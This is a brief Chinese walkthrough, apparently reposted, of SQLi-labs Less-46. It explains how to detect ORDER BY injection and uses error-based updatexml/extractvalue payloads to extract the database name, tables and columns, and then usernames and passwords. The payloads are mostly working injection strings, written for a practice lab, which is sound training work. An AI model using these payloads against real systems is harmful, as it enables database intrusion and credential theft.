Less（46）

1.看一下php

　　（1）用order by 注入来看看

　　（2）通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入

　　　　　?sort=1+asc

　　　　?sort=1+desc

2.报错注入

　　（1）爆库：?sort=1 and(updatexml(1,concat(0x7e,(select database())),0))

　　（2）爆表：?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="security" and table_name not in('emails','referers'))),0))　　　　　　

　　（3）爆列名：?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('first_name','last_name','user_id','last_login','avatar','failed_login','user'))),0))

　　（4）爆值：?sort=1 and (extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))))

来源：https://www.cnblogs.com/meng-yu37/p/12491307.html

标签

less

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!